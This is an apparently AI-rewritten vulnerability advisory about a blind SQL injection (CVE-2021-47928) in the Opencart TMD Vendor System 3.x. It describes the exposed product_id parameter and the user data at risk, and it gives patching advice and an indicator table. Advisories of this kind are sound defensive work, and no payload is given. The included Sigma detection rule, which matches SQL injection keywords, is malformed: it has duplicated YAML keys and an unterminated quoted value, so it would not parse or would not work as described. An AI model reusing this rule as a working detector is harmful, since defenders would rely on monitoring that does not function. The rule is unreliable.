Opencart TMD Vendor System Blind SQLi Exposes User Data
The National Vulnerability Database (NVD) reports a critical blind SQL injection vulnerability, CVE-2021-47928, affecting Opencart TMD Vendor System 3.x. This flaw allows unauthenticated attackers to extract sensitive database information without requiring any prior authentication.
Attackers can exploit the product_id parameter to inject malicious SQL queries. According to the NVD, both time-based and content-based blind injection techniques are viable. This enables the enumeration of critical data from the oc_user table, specifically targeting usernames, email addresses, and password reset codes. A CVSSv3.1 score of 8.2 (HIGH) underscores the severity, with a vector indicating network-exploitable, low attack complexity, and no user interaction required.
While the NVD did not specify affected product versions beyond “3.x,” the implications are clear: any organization running this specific Opencart module is exposed. The attacker’s calculus here is straightforward — unauthenticated access to user credentials is a high-value target, providing immediate avenues for further compromise, account takeovers, and potentially broader system access.
What This Means For You
- If your organization uses Opencart TMD Vendor System 3.x, you are directly exposed to unauthenticated data exfiltration. Immediately identify if this specific module is deployed and, if so, prioritize patching or implementing compensating controls. Audit your user logs for any suspicious activity or unusual access patterns that might indicate prior exploitation.
Related ATT&CK Techniques
🛡️ Detection Rules
3 rules · 6 SIEM formats3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.
CVE-2021-47928 - Opencart TMD Vendor System Blind SQLi via product_id
title: CVE-2021-47928 - Opencart TMD Vendor System Blind SQLi via product_id
id: scw-2026-05-10-ai-1
status: experimental
level: high
description: |
Detects attempts to exploit CVE-2021-47928 in Opencart TMD Vendor System. This rule looks for requests containing 'product_id' along with common blind SQL injection indicators like 'SLEEP', 'AND', and parentheses, specifically targeting the parameter used in the vulnerability.
author: SCW Feed Engine (AI-generated)
date: 2026-05-10
references:
- https://shimiscyberworld.com/posts/nvd-CVE-2021-47928/
tags:
- attack.initial_access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- 'product_id'
cs-uri-query|contains:
- 'SLEEP'
cs-uri-query|contains:
- 'AND'
cs-uri-query|contains:
- '(
cs-uri-query|contains:
- ')'
condition: selection
falsepositives:
- Legitimate administrative activity
Source: Shimi's Cyber World · License & reuse
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2021-47928 | SQLi | Opencart TMD Vendor System 3.x |
| CVE-2021-47928 | SQLi | Vulnerable parameter: product_id |
| CVE-2021-47928 | Information Disclosure | Extractable data: usernames, emails, password reset codes from oc_user table |
Written by SCW Vulnerability Desk
Source & Attribution
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | May 10, 2026 at 16:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
Believe this infringes your rights? Submit a takedown request.
Related coverage
Aero CMS 0.0.1 Vulnerability Allows Authenticated PHP Code Injection
CVE-2022-50944 — Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through...
CyberPanel 2.1 RCE via Symlink Attack (CVE-2021-47949)
CVE-2021-47949 — CyberPanel 2.1 contains a command execution vulnerability that allows authenticated attackers to read arbitrary files and execute remote code by exploiting symlink attacks...
TextPattern CMS RCE (CVE-2021-47943) Allows Authenticated Attackers to Execute Commands
CVE-2021-47943 — TextPattern CMS 4.8.7 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary commands by uploading malicious PHP files through...